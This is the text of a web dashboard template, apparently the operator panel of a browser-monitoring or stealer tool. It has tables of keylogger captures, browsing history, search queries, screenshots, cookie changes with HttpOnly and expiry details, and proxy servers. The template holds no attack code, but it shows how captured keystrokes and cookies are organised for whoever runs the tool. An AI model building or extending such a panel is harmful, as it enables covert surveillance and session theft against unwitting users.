| ID | Username | Role | Allowed | Proxies | Actions |
|---|---|---|---|---|---|
| {{ u.userId }} | {{ u.userName }} | {{ u.role }} | Yes No | No proxies | |
| No users found. | |||||
| ID | Username | URL | Captured Text | Captured At |
|---|---|---|---|---|
| {{ log.id }} | {{ log.userName || '-' }} | {{ log.url || '-' }} | {{ log.text || '-' }} | {{ formatTime( log.capturedAt) }} |
| No keylogger entries found. | ||||
| ID | Username | URL | Title | Visit Count | Visit Time |
|---|---|---|---|---|---|
| {{ log.id }} | {{ log.userName || '-' }} | {{ log.url || '-' }} | {{ log.title || '-' }} | {{ log.visitCount || '-' }} | {{ formatTime( log.lastVisitTime) }} |
| No keylogger entries found. | |||||
| ID | Username | URL | Query | Engine | Captured At |
|---|---|---|---|---|---|
| {{ s.id }} | {{ s.userName || '-' }} | {{ s.url || '-' }} | {{ s.engine || '-' }} | {{ s.query || '-' }} | {{ formatTime( s.timestamp) }} |
| No Search entries found. | |||||
| ID | Username | Url | ImgSize | TimeStamp | Action |
|---|---|---|---|---|---|
| {{ p.id }} | {{ p.userName }} | {{ p.url }} | {{ p.imgSize }} | {{ formatTime(p.time) }} | |
| No Screen found. | |||||
| Id | UserName | Type | Domain | ChangeType | Time | Action |
|---|---|---|---|---|---|---|
| {{ s.id }} | {{ s.userName }} | {{ s.type }} | {{ s.domain }} | {{ formatTime(s.time)}} | {{ s.changeType }} | |
| Nothing To Show | ||||||
| Id | User Name | Domain | Change Type | HttpOnly | Expires | Time | Action |
|---|---|---|---|---|---|---|---|
| {{ c.id }} | {{ c.userName }} | {{ c.domain }} | {{ c.changeType }} | {{ c.httpOnly ? 'Yes' : 'No' }} | {{ formatExpiry(c.exp) }} | {{ formatTime(c.timestamp) }} | |
| No Cookies Found | |||||||
| ID | Server | IP | Port | Schema | Status | Auth | Actions |
|---|---|---|---|---|---|---|---|
| {{ p.id }} | {{ p.serverName }} | {{ p.ip }} | {{ p.port }} | {{ p.schema }} | Active Inactive | Auth None | |
| No proxies found. | |||||||